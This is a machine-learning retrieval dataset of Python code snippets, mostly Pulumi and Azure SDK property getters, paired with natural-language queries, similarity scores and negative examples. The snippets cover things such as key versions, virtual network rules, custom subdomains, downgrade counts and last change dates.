[ "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[int]:\n return pulumi.get(self, \"capacity\")", "def capacity(self):\n return self._capacity", "def capacity(self):\n return self._capacity", "def capacity(self):\n return self._cap", "def desired_capacity(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"desired_capacity\")", "def capacity(self) -> Capacity:\n raw = self._call('GET', 'capacity')\n return Capacity.parse_raw(raw)", "def capacity(self):\n return str(int(self._properties.get('capacity')) * 1073741824)", "def capacity_gb(self) -> str:\n return pulumi.get(self, \"capacity_gb\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"capacity\")", "def capacity(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"capacity\")", "def current_capacity(self, capacity=None):\n if capacity:\n if self._request('SC', str(capacity))[0]:\n return capacity\n else:\n done, data = self._request('GE')\n if done:\n return int(data[0])\n\n raise EvseError", "def get_capacity_var(self):\n return self._capacity_var", "def capacity(self) -> typing.Optional[str]:\n value = self._properties.get(\"capacity\")\n return f\"{value}\" if value is not None else None", "def capacity(self):\n raise NotImplementedError()", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def get_capacity_param(self):\n intr = self.get_interaction()\n return intr.get_capacity(None, None, None, None, raw=True)", "def get_heap_cap(self):\r\n return self.capacity", "def minimum_health_capacity(self):\n return self._minimum_health_capacity", "def capacity(self, value: typing.Union[str, int, None]):\n self._properties[\"capacity\"] = _types.integer_or_string(value)", "def capacity(self):\n capacity = {}\n resources = self.nodes[0].capacity.keys()\n for r in resources:\n values = [n.capacity[r] for n in self.nodes]\n capacity[r] = mean(values) if len(values) > 0 else 0.0\n return capacity", "def get_capacity_var(self):\n return self.get_interaction().get_capacity_var()" ]
[ "0.7532596", "0.7532596", "0.7532596", "0.7532596", "0.7492223", "0.745867", "0.7449016", "0.7422382", "0.7390689", "0.7366575", "0.72826654", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.72591174", "0.7257428", "0.72303516", "0.7183032", "0.6952233", "0.69227135", "0.6895933", "0.684459", "0.6841447", "0.682207", "0.6767818", "0.67603135", "0.6753784" ]
0.84809434
0
Version of the Key from KeyVault
def key_version(self) -> Optional[str]: return pulumi.get(self, "key_version")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def version_template(self) -> pulumi.Output['outputs.CryptoKeyVersionTemplateResponse']:\n return pulumi.get(self, \"version_template\")", "def get_key_request(self, vault_name: str, key_name: str, key_version: str) -> dict[str, Any]:\n\n url = f'https://{vault_name}{self.azure_cloud.suffixes.keyvault_dns}/keys/{key_name}'\n if key_version:\n url = url + f'/{key_version}'\n response = self.http_request(\n 'GET', full_url=url, resource=self.get_vault_resource())\n\n return response", "def my_verkey(self) -> str:\n\n return self._my_verkey", "def verkey(self) -> str:\n\n return self._verkey", "def get_key_command(client: KeyVaultClient, args: dict[str, Any]) -> CommandResults:\n vault_name = args['vault_name']\n key_name = args['key_name']\n key_version = args.get('key_version', '')\n\n response = client.get_key_request(vault_name, key_name, key_version)\n cloned_response = copy.deepcopy(response)\n outputs = copy.deepcopy(response)\n outputs['attributes'] = convert_time_attributes_to_iso(outputs['attributes'])\n outputs['key_vault_name'] = vault_name\n\n readable_key_info = convert_key_info_to_readable(cloned_response['key'])\n readable_attrib = convert_attributes_to_readable(cloned_response['attributes'])\n\n readable_output = tableToMarkdown(f'{key_name} Information',\n {**readable_key_info, **readable_attrib},\n ['key_id', 'enabled', 'json_web_key_type', 'key_operations', 'create_time',\n 'update_time',\n 'expiry_time'],\n removeNull=True,\n headerTransform=string_to_table_header)\n\n command_results = CommandResults(\n outputs_prefix='AzureKeyVault.Key',\n outputs_key_field='kid',\n outputs=outputs,\n raw_response=response,\n readable_output=readable_output,\n ignore_auto_extract=True\n )\n\n return command_results", "def get_version_key(self, version):\n if self._generic_only:\n return GENERIC_VERSION\n else:\n self.check_version_exists(version)\n return version", "def GetKey(self, version_number):\n return self.dict[str(version_number)]", "def get_version(self, extra=None):\n\n if extra:\n key = self._get_extra_key(extra)\n else:\n key = self.key\n\n v = self._get_cache(key).get(key)\n if v == None:\n v = self._increment_version(extra=extra)\n\n return \"%s.%s\" % (key, v)", "def GetKeyVersionForSigning(self, client_key_version):\n if self.rotate_keys_automatically and client_key_version is not None:\n # Return the incremented version, which means that the key should be\n # rotated.\n return client_key_version + 1\n # Return the version that is specified by the config, defaulting to using\n # the very first key. 
Note that incrementing here is done due to conversion\n # between indices in the keys list and the key versions transmitted to the\n # client (where the latter have to be positive according to the policy\n # protocol definition).\n return self.GetPolicies().get('current_key_index', 0) + 1", "def key_vault_id(self) -> str:\n return pulumi.get(self, \"key_vault_id\")", "def version_template(self) -> Optional[pulumi.Input['CryptoKeyVersionTemplateArgs']]:\n return pulumi.get(self, \"version_template\")", "def kms_key_version_name(self) -> str:\n return pulumi.get(self, \"kms_key_version_name\")", "def key_vault_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"key_vault_id\")", "def their_verkey(self) -> str:\n\n return self._their_verkey", "def snapshot_encryption_key(self) -> 'outputs.CustomerEncryptionKeyResponse':\n return pulumi.get(self, \"snapshot_encryption_key\")", "def primary(self) -> pulumi.Output['outputs.CryptoKeyVersionResponse']:\n return pulumi.get(self, \"primary\")", "def GetKeyByVersion(self, key_version):\n # Convert the policy key version, which has to be positive according to the\n # policy protocol definition, to an index in the keys list.\n key_index = key_version - 1\n if key_index < 0:\n return None\n if key_index >= len(self.keys):\n if self.rotate_keys_automatically:\n key_index %= len(self.keys)\n else:\n return None\n return self.keys[key_index]", "def test_get_a_vault_by_pubkey(self):\n pass", "def privKeyVersion(privK, cur, isCompressed = True):\n\tisWIF, comment = isWif(privK, cur)\n\tif isWIF is True:\n\t\tif isCompressed is True:\n\t\t\tprivK = enc.decode(enc.encode(enc.decode(privK, 58), 256)[1:-5], 256)\n\t\telse:\n\t\t\tprivK = enc.decode(enc.encode(enc.decode(privK, 58), 256)[1:-4], 256)\n\telif isHex(privK):\n\t\tprivK = enc.decode(privK, 16)\n\telif isBase64(privK):\n\t\tprivK = privK.decode('base64', 'strict')\n\telif isBase6(privK):\n\t\tprivK = privK.decode('base6', 'strict')\n\treturn privK", "def load_key():\n return open(\"Secret.key\",\"rb\").read()", "def key_vault_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"key_vault_id\")", "def key_encryption_key(self) -> Optional[pulumi.Input['KeyVaultAndKeyReferenceArgs']]:\n return pulumi.get(self, \"key_encryption_key\")", "def compare_versions_key(x):\n return cmp_to_key(compare_versions)(x)", "def fastlyversion(args):\n pprint(api.version(service_id, args[0]).attrs)", "def download_key():\n data = check_args(('cloudProvider', ))\n provider = jobs.init_provider(data, True)\n key = encrypt_key(provider.get_key(), data['username'])\n return make_response(keyName=provider.keyname, key=key)", "async def version(self) -> dict:\n if not self.http_session:\n raise RuntimeError('Client has been disconnected')\n\n version_url = f'http://{self.host}:{self.port:d}/json/version'\n\n logger.debug('GET %s', version_url)\n resp = await self.http_session.get(version_url)\n resp.raise_for_status()\n\n return await resp.json()", "def private_key(self):", "def _get_version(self):\n if _cbc_version is None:\n return _extract_version('')\n return _cbc_version", "def public_key(self):", "def get_version(self) -> Dict[str, str]:\n return self.http.get(self.config.paths.version)" ]
[ "0.6438031", "0.63502395", "0.63091785", "0.62830764", "0.62450016", "0.6224766", "0.62174904", "0.6146448", "0.6091593", "0.5932736", "0.5924557", "0.5905134", "0.5850796", "0.5846698", "0.5845496", "0.57633024", "0.5708141", "0.5634579", "0.5590769", "0.5518944", "0.5513102", "0.5503286", "0.55009097", "0.5458534", "0.5449937", "0.5446579", "0.54443514", "0.54143703", "0.5397326", "0.53962845" ]
0.6812989
0
The list of virtual network rules.
def virtual_network_rules(self) -> Optional[Sequence['outputs.VirtualNetworkRuleResponse']]: return pulumi.get(self, "virtual_network_rules")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"virtual_network_rules\")", "def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs']]]]:\n return pulumi.get(self, \"virtual_network_rules\")", "def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventhubNamespaceSpecNetworkRuleVirtualNetworkRulesArgs']]]]:\n return pulumi.get(self, \"virtual_network_rules\")", "def getListOfRules(self):\n return self.model.getListOfRules()", "def get_rules(self):\n rules = []\n for item in self.rule:\n rules.append(item)\n return rules", "def get_rules(self):\n rules = []\n for item in self.name:\n rules.append(item)\n return rules", "def getListOfRules(self, *args):\n return _libsbml.Model_getListOfRules(self, *args)", "def get_rules(self):\n # TODO: Implement\n self.traverse2(self.tree, [])\n return self.rules", "def rules(self) -> List['outputs.PreventionInspectTemplateInspectConfigRuleSetRule']:\n return pulumi.get(self, \"rules\")", "def list_role_inference_rules(self):\n raise exception.NotImplemented() # pragma: no cover", "def vrules(self):\n ...", "def filter_rules(self) -> list:\n return self.transform(self._tree), self._rules", "def get_rules(cls):\n raise NotImplementedError()", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperations']]:\n return pulumi.get(self, \"rules\")", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperations']]:\n return pulumi.get(self, \"rules\")", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperationsPatch']]:\n return pulumi.get(self, \"rules\")", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperationsPatch']]:\n return pulumi.get(self, \"rules\")", "def rules(self):\n return tuple(e for e in self.entries if e.is_rule)", "def rules(cls):\n rules_CityscapesValConfig = {\"batch_size\": {\"type\": int},\n \"list_path\": {\"type\": str}\n }\n return rules_CityscapesValConfig", "def rules(self) -> pulumi.Output[Sequence['outputs.BucketLifecycleConfigurationV2Rule']]:\n return pulumi.get(self, \"rules\")", "def get_rules(cls) -> list:\n return [factory() for factory in cls._rules_factories]", "def rules(cls):\n rules_CityscapesTrainConfig = {\"batch_size\": {\"type\": int},\n \"list_path\": {\"type\": str}\n }\n return rules_CityscapesTrainConfig", "def ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleIpRulesArgs']]]]:\n return pulumi.get(self, \"ip_rules\")", "def ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventhubNamespaceSpecNetworkRuleIpRulesArgs']]]]:\n return pulumi.get(self, \"ip_rules\")", "def get_rules(self):\n return [phi for psi in self._Psi for phi in psi]", "def rules(self) -> FrozenOrderedSet[Union[Callable, Rule]]:\n return self._rules", "def create_url_rules(self):\n return []", "def rules(self) -> pulumi.Input[Sequence[pulumi.Input['BucketLifecycleConfigurationV2RuleArgs']]]:\n return pulumi.get(self, \"rules\")", "def get_nat_rules():\n url = '{}/packetfilter/nat'.format(common_bits.base_url)\n result = common_bits.get_request(url, common_bits.headers, common_bits.payload)\n\n return result.json()", "def eqv_path_rules(self) -> List[Tuple[CombinatorialClassType, Rule]]:\n eqv_path_rules = []\n curr = self.comb_class\n for rule in self.rules:\n eqv_path_rules.append((curr, rule))\n curr = rule.children[0]\n return eqv_path_rules" ]
[ "0.776357", "0.77235216", "0.76376677", "0.7382955", "0.7215082", "0.6944976", "0.6879922", "0.68092316", "0.65993077", "0.63442385", "0.629894", "0.6288252", "0.62423277", "0.6196568", "0.6196568", "0.61666393", "0.61666393", "0.6166045", "0.61336064", "0.6104291", "0.608563", "0.6024484", "0.6022135", "0.60164726", "0.5996033", "0.59706944", "0.5952349", "0.5930842", "0.59297276", "0.59103996" ]
0.792192
1
Maps the region to the regional custom subdomain.
def customsubdomain(self) -> Optional[str]: return pulumi.get(self, "customsubdomain")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def bucket_regional_domain_name(self) -> str:\n ...", "def custom_sub_domain_name(self) -> Optional[str]:\n return pulumi.get(self, \"custom_sub_domain_name\")", "def bucket_regional_domain_name(self) -> str:\n return jsii.get(self, \"bucketRegionalDomainName\")", "def bucket_regional_domain_name(self) -> str:\n return jsii.get(self, \"bucketRegionalDomainName\")", "def get_aws_domain(region: str):\n if region.startswith(\"cn-\"):\n return \"amazonaws.com.cn\"\n elif region.startswith(\"us-iso-\"):\n return \"c2s.ic.gov\"\n elif region.startswith(\"us-isob-\"):\n return \"sc2s.sgov.gov\"\n else:\n return \"amazonaws.com\"", "def custom_domain(self):\n return self._custom_domain", "def subdomain(self, subdomain):\r\n return subdomains.Subdomain(self, subdomain)", "def getSubdomain(self):\n\t\treturn self.Subdomain", "def custom_domain(self, custom_domain):\n self._custom_domain = custom_domain", "def subdomain(self, subdomain):\n return subdomains.Subdomain(self, subdomain)", "def custom_domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"custom_domain\")", "def custom_domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"custom_domain\")", "def custom_domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"custom_domain\")", "def domain(self, domain):", "def bucket_regional_domain_name(self) -> typing.Optional[str]:\n return self._values.get('bucket_regional_domain_name')", "def domainRouter(self, domain, subrouter):\n pass", "def add_subdomain_output(self,filename,ll_x,ll_y, ur_x, ur_y, epsgIN,start,stop,step):\n bounds = []\n bounds.append([ll_x,ll_y])\n bounds.append([ur_x,ur_y])\n bounds = convert_points(bounds,epsgIN,4326) #convert bounds to Lat Long\n\n bounds = LL2LocalRicom(bounds, self.ricom.lat0, self.ricom.long0, self.ricom.latoff, self.ricom.longoff) #convert bounds to Local Ricom Coordinated\n self.run_nc.add_subdomain_output(filename,bounds[0][0],bounds[0][1], bounds[1][0], bounds[1][1],start,stop,step)\n \n #self.grid.get_grid_bounds()", "def subdomain(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"subdomain\")", "def set_subdomains(self, f):\n s = \"::: setting 2D subdomains :::\"\n print_text(s, cls=self)\n\n self.ff = MeshFunction('size_t', self.mesh)\n self.cf = MeshFunction('size_t', self.mesh)\n self.ff_acc = MeshFunction('size_t', self.mesh)\n f.read(self.ff, 'ff')\n f.read(self.cf, 'cf')\n f.read(self.ff_acc, 'ff_acc')\n \n self.ds = Measure('ds')[self.ff]\n self.dx = Measure('dx')[self.cf]\n \n self.dx_g = self.dx(0) # internal above grounded\n self.dx_f = self.dx(1) # internal above floating\n self.dBed_g = self.ds(3) # grounded bed\n self.dBed_f = self.ds(5) # floating bed\n self.dBed = self.ds(3) + self.ds(5) # bed\n self.dSrf_gu = self.ds(8) # grounded with U observations\n self.dSrf_fu = self.ds(9) # floating with U observations\n self.dSrf_u = self.ds(8) + self.ds(9) # surface with U observations\n self.dSrf_g = self.ds(2) + self.ds(8) # surface of grounded ice\n self.dSrf_f = self.ds(6) + self.ds(9) # surface of floating ice\n self.dSrf = self.ds(6) + self.ds(2) \\\n + self.ds(8) + self.ds(9) # surface\n self.dLat_d = self.ds(7) # lateral divide\n self.dLat_to = self.ds(4) # lateral terminus overwater\n self.dLat_tu = self.ds(10) # lateral terminus underwater\n self.dLat_t = self.ds(4) + self.ds(10) # lateral terminus\n self.dLat = self.ds(4) + self.ds(7) \\\n + self.ds(10) # lateral", "def par_domain(self):", "def set_by_domain(domain):\r\n if not has_configuration_set() or not domain:\r\n 
return\r\n\r\n for key, value in settings.MICROSITE_CONFIGURATION.items():\r\n subdomain = value.get('domain_prefix')\r\n if subdomain and domain.startswith(subdomain):\r\n _set_current_microsite(key, subdomain, domain)\r\n return\r\n\r\n # if no match on subdomain then see if there is a 'default' microsite defined\r\n # if so, then use that\r\n if 'default' in settings.MICROSITE_CONFIGURATION:\r\n _set_current_microsite('default', subdomain, domain)", "def relevant_domains(self):\n pass", "def subdomain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subdomain\")", "def setNodeDNSDomain(self,node,domain):\n post_data = {'search': str(domain)}\n data = self.connect('put',\"nodes/%s/dns\" % (node), post_data)\n return data", "def domain( self ):\n raise NotImplementedError(\"domain\")", "def block_override_domain(self) -> str:\n return pulumi.get(self, \"block_override_domain\")", "def add_subdomain_output(self,filename,ll_x,ll_y, ur_x, ur_y,start,stop,step,area_id = 0): \n \n self.number_of_subdomains += 1\n self.subdomains.number_of_subdomains = self.number_of_subdomains #set the 'number_of_subdomains' attribute \n name = 'subdomain' + str(self.number_of_subdomains) \n self.subdomainGroups.append(self.subdomains.createGroup(name) ) #great a new subdomain Group\n \n self.subdomainGroups[self.number_of_subdomains-1].filename = filename #set the bounds attributes for the subdomain\n\n self.subdomainGroups[self.number_of_subdomains-1].ll_x = ll_x #set the bounds attributes for the subdomain\n self.subdomainGroups[self.number_of_subdomains-1].ll_y = ll_y\n self.subdomainGroups[self.number_of_subdomains-1].ur_x = ur_x\n self.subdomainGroups[self.number_of_subdomains-1].ur_y = ur_y\n self.subdomainGroups[self.number_of_subdomains-1].start = start\n self.subdomainGroups[self.number_of_subdomains-1].stop = stop\n self.subdomainGroups[self.number_of_subdomains-1].step = step\n self.subdomainGroups[self.number_of_subdomains-1].area_id = area_id", "def subdomain(self, domain=None, subdomain=None):\n\n return self.subdomain_class(apiobj=self, domainname=domain,\n subdomain=subdomain)", "def get_single_zone(self, region):\n # TODO: Implement zones list\n # Hardcoded to us-west2\n z = {\n \"us-west2\": ['us-west2-a', 'us-west2-b', 'us-west2-c'],\n \"us-west1\": ['us-west1-a', 'us-west1-b', 'us-west1-c']\n }\n return z[region][:1]", "def set_region(sender, instance, *args, **kwargs):\n if instance.geocity and not instance.georegion:\n instance.georegion = instance.geocity.region" ]
[ "0.66863793", "0.5875713", "0.584936", "0.584936", "0.5845517", "0.58098024", "0.58075595", "0.5707554", "0.56916225", "0.55765885", "0.5548106", "0.5548106", "0.5548106", "0.55425155", "0.55297667", "0.5515043", "0.5466608", "0.54244334", "0.53858924", "0.5385837", "0.5327297", "0.5300162", "0.522155", "0.5172126", "0.5146798", "0.5141667", "0.512851", "0.51187336", "0.51168954", "0.5070745" ]
0.61522025
1
Gets the count of downgrades.
def count_of_downgrades(self) -> Optional[float]:
        return pulumi.get(self, "count_of_downgrades")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_of_upgrades_after_downgrades(self) -> Optional[float]:\n return pulumi.get(self, \"count_of_upgrades_after_downgrades\")", "def count_downvotes(self):\n return self.filter(value=-1).count()", "def data_downgrades():\n pass", "def data_downgrades():\n pass", "def get_downlink_cnt(self) -> int:\n\n try:\n self._serial.transmit(b'\\x55\\x00')\n response = self._get_reply(0x55, 4, 0.25)\n finally:\n self._gpio.sleep()\n\n return int.from_bytes(response[2:6], 'little', signed=False)", "def getDownloadCount(self):\n if self.downloadcount == -1:\n self.downloadcount = self.db.downloadcount()\n\n return self.downloadcount", "def dump_updown_count(self):\n raise NotImplementedError(\"Should implement dump_updown_count()\")", "def decreases_remaining(self):\n return 2 - self.decreases_today", "def downloads(self):\n return self.proto.details.appDetails.numDownloads", "def get_downvotes(self, obj):\n content_type = ContentType.objects.get_for_model(obj)\n\n votes = self.filter(content_type=content_type, object_id=obj._get_pk_val(), vote__exact=DOWNVOTE).aggregate(downvotes=Sum('vote'))\n\n if votes['downvotes'] is None:\n votes['downvotes'] = 0\n\n return -votes['downvotes']", "def get_download_count(self):\n downloads = self.driver.find_elements(*DownloadFileLocators.DOWNLOADS)\n return len(downloads)", "def showNbLevelLose(self) :\n nbLevelLose = 0\n for level in self.level_history :\n if level.result == 0:\n nbLevelLose += 1\n Scenario.messageGetNbLevelLose(nbLevelLose)", "def get_remaining_count(self):\n return self.total_count - self.count", "def get_devs_count(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetDevsCount', self.handle)", "def fourth_down_attempts(self):\n return self._fourth_down_attempts", "def alerts_count(self) -> int:\n return pulumi.get(self, \"alerts_count\")", "def get_death_count(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> int\n death_header = envelope.get_header('x-death')\n\n if death_header is None:\n return 0\n\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count", "def get_usb_devs_count(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetUsbDevsCount', self.handle)", "def get_tries(self):\n return self._tries", "async def _get_num_open_trades(self) -> int:\n\n num = 0\n\n for pair in self.trades:\n num += len(self.trades[pair]['open'])\n\n return num", "def count(self):\n return self.get_count()", "def countEdges(self):\n n = 0\n for (hub, table) in self.totsupport.iteritems():\n n += len(table)\n return n", "def third_down_attempts(self):\n return self._third_down_attempts", "def counter(self) -> int:\n return self._fail_counter", "def DownloadedPacketCount(self):\n if self.force_auto_sync:\n self.get('DownloadedPacketCount')\n return self._DownloadedPacketCount", "def unsubscribed_member_count(self):\n return self._unsubscribed_member_count", "def get_count(self):\n\n\t\treturn self.__count", "def no_locked_budgets(self) -> int:\n count = 0\n for budget in self.budgets.values():\n if budget.locked:\n count += 1\n return count", "def get_count(self):\r\n return self.count", "def get_count(self):\n return self.count" ]
[ "0.8287235", "0.67211527", "0.62132925", "0.62132925", "0.6082984", "0.6066136", "0.59956974", "0.59314454", "0.5926545", "0.58456475", "0.57416725", "0.563767", "0.5635512", "0.56127214", "0.55500185", "0.54669005", "0.5453762", "0.5427202", "0.542651", "0.54143727", "0.5398292", "0.5368816", "0.5354835", "0.5325718", "0.5319959", "0.5312474", "0.53027296", "0.52890384", "0.5285044", "0.5281087" ]
0.8500595
0
Gets the count of upgrades after downgrades.
def count_of_upgrades_after_downgrades(self) -> Optional[float]:
        return pulumi.get(self, "count_of_upgrades_after_downgrades")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_of_downgrades(self) -> Optional[float]:\n return pulumi.get(self, \"count_of_downgrades\")", "def getUpgrades(self) -> list:\n return self.state[UPGRADES]", "def count_downvotes(self):\n return self.filter(value=-1).count()", "def dump_updown_count(self):\n raise NotImplementedError(\"Should implement dump_updown_count()\")", "def downloads(self):\n return self.proto.details.appDetails.numDownloads", "def data_downgrades():\n pass", "def data_downgrades():\n pass", "def needs_upgrade(self):\n return self.__api.call('dashboards/needs_upgrade',\n id_dashboard=self.id)", "def get_num_updates(self):\n return self._num_updates", "def decreases_remaining(self):\n return 2 - self.decreases_today", "async def on_upgrade_complete(self, upgrade: UpgradeId):", "def UpgradeProgress(self):\n if self.force_auto_sync:\n self.get('UpgradeProgress')\n return self._UpgradeProgress", "def get_downlink_cnt(self) -> int:\n\n try:\n self._serial.transmit(b'\\x55\\x00')\n response = self._get_reply(0x55, 4, 0.25)\n finally:\n self._gpio.sleep()\n\n return int.from_bytes(response[2:6], 'little', signed=False)", "def getDownloadCount(self):\n if self.downloadcount == -1:\n self.downloadcount = self.db.downloadcount()\n\n return self.downloadcount", "def slow_upd_count(self):\n return self.upd_type_count(\"slow\", [0] * 24)", "def get_download_count(self):\n downloads = self.driver.find_elements(*DownloadFileLocators.DOWNLOADS)\n return len(downloads)", "def test_list_upgrades_absent(self):\n pkg_cmd = MagicMock(return_value=\"\")\n\n with patch.dict(pkgng.__salt__, {\"cmd.run_stdout\": pkg_cmd}):\n result = pkgng.list_upgrades(refresh=False)\n self.assertDictEqual(result, {})\n pkg_cmd.assert_called_with(\n [\"pkg\", \"upgrade\", \"--dry-run\", \"--quiet\", \"--no-repo-update\"],\n output_loglevel=\"trace\",\n python_shell=False,\n ignore_retcode=True,\n )", "def countEdges(self):\n n = 0\n for (hub, table) in self.totsupport.iteritems():\n n += len(table)\n return n", "def need_upgrade(self):\n dashboards = self.__api.call('dashboards/need_upgrade_list')['dashboards']\n return [Dashboard(self.__api, x['dashboard']) for x in dashboards]", "def showNbLevelLose(self) :\n nbLevelLose = 0\n for level in self.level_history :\n if level.result == 0:\n nbLevelLose += 1\n Scenario.messageGetNbLevelLose(nbLevelLose)", "def db_downgrade(step):\n to_use = [_.strip('.sql') for _ in migration_files()]\n\n # since it's a downgrade, a reverse of the migration is essential\n to_use.reverse()\n\n generate_migration_file()\n dbd_query = anosql.from_path(MIGRATION_FILE, 'psycopg2')\n\n try:\n count = 0\n for _ in to_use:\n count += 1\n if MySQLScheme.fetch_one(REVISION_EXISTS,\n **{\"args\": {'revision': _}}):\n MySQLScheme.commit(getattr(dbd_query, f\"downgrade_{_}\").sql)\n LOGGER.info(f\"successful downgrade: {_}\")\n if count == step:\n break\n except errors.ProgrammingError:\n print(\"no more downgrade left\")", "def reg_upd_count(self):\n return self.upd_type_count(\"regular\", [0] * 24)", "def unsubscribed_member_count(self):\n return self._unsubscribed_member_count", "def get_tries(self):\n return self._tries", "def UpgradeState(self):\n if self.force_auto_sync:\n self.get('UpgradeState')\n return self._UpgradeState", "def retained_backups(self) -> int:\n return pulumi.get(self, \"retained_backups\")", "def getAllUpgrades(self):\n\t\tquery = ''\n\t\tconn = self.get_connection()\n\t\theaders = { 'Content-type' : 'application/json', 'Authorization' : 'A10 %s' %self.sessionid}\n\t\tconn.request('GET', 
self.get_path() + '/' + query, headers=headers)\n\t\tresponse = conn.getresponse()\n\t\texpected_status = 200\n\t\terrors = {500: 'An unexpected runtime exception'}\n\t\tpayload = self.get_output(response, expected_status, errors)\n\t\tconn.close()\n\t\tif self.debug:\n\t\t\tprint 'payload:', payload\n\t\tif payload == '':\n\t\t\tpayload = None\n\t\tif payload is not None:\n\t\t\tdata = json.loads(payload)\n\t\t\tpayload= data.get('upgradeList')\n\t\treturn deserialize_list_Upgrade_json(payload)", "def fourth_down_attempts(self):\n return self._fourth_down_attempts", "def num_updates(self):\r\n return len(self.q(css='section.updates section article').results)", "def n_versions(self):\n return len(self.onxs)" ]
[ "0.7273881", "0.62744755", "0.5958437", "0.58793324", "0.58278257", "0.5820554", "0.5820554", "0.5792164", "0.578981", "0.57145786", "0.5697508", "0.56740063", "0.5644544", "0.5571523", "0.5564085", "0.55153704", "0.5468588", "0.54553634", "0.5416293", "0.5406054", "0.5377968", "0.5367723", "0.53643954", "0.53409886", "0.5338278", "0.5319654", "0.5314328", "0.53141546", "0.5309367", "0.53017086" ]
0.8690283
0
Gets the last change date.
def last_change_date(self) -> Optional[str]:
        return pulumi.get(self, "last_change_date")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def svn_info_t_last_changed_date_get(svn_info_t_self): # real signature unknown; restored from __doc__\n pass", "def dt_last_update(self):\n return self.last_update", "def status_change_date(self) -> str:\n return pulumi.get(self, \"status_change_date\")", "def __last_commit_date(self):\n return utils.run('git', ['log', '--all', '-1', '--format=%cI'],\n self.__project.location).rstrip()", "def lastdate(self):\n if hasattr(self, \"_lastdate\"):\n return self._lastdate\n else:\n return None", "def last_date(self):\n if self._last_date is None:\n raise ValueError(\"Run pick() method before access this property\")\n return self._last_date", "def last_commit_date():\n return subprocess.check_output(['git', 'log', '-1', '--pretty=%ad',\n '--date=format:%d %b %H:%M', 'py/calendon']).decode().strip()", "def last_contribution_date(self):\n from kitsune.customercare.models import Reply\n from kitsune.questions.models import Answer\n from kitsune.wiki.models import Revision\n\n dates = []\n\n # Latest Army of Awesome reply:\n try:\n aoa_reply = Reply.objects.filter(\n user=self.user).latest('created')\n dates.append(aoa_reply.created)\n except Reply.DoesNotExist:\n pass\n\n # Latest Support Forum answer:\n try:\n answer = Answer.objects.filter(\n creator=self.user).latest('created')\n dates.append(answer.created)\n except Answer.DoesNotExist:\n pass\n\n # Latest KB Revision edited:\n try:\n revision = Revision.objects.filter(\n creator=self.user).latest('created')\n dates.append(revision.created)\n except Revision.DoesNotExist:\n pass\n\n # Latest KB Revision reviewed:\n try:\n revision = Revision.objects.filter(\n reviewer=self.user).latest('reviewed')\n # Old revisions don't have the reviewed date.\n dates.append(revision.reviewed or revision.created)\n except Revision.DoesNotExist:\n pass\n\n if len(dates) == 0:\n return None\n\n return max(dates)", "def last_changed(self):\n return self._last_changed", "def get_last_update(self):\n return self.ticker.all().order_by('-created').first()", "def last_update(self):\n return self._last_update", "def last_update(self):\n return self._last_update", "def last_status_change(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"last_status_change\")", "def get_latest_date(cls):\n\n return cls.query.order_by(desc(cls.date)).first().date", "def last_changed_utc(self) -> str:\n return pulumi.get(self, \"last_changed_utc\")", "def get_rates_grid_last_modified_date(self):\n return self.get_specific_column_value_from_grid(self.rates_grid_div_id, self.rates_grid_row_count, self.last_modified_column_name)", "def get_last_modified_date(self):\n\t\treturn call_sdk_function('PrlFsEntry_GetLastModifiedDate', self.handle)", "def get_last_modified_date(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetLastModifiedDate', self.handle)", "def last_edit(self) -> datetime.datetime:\n self.update_status()\n return datetime.datetime.fromtimestamp(self._last_edit)", "def previous_date(self):\n yesterday = pendulum.yesterday('UTC')\n 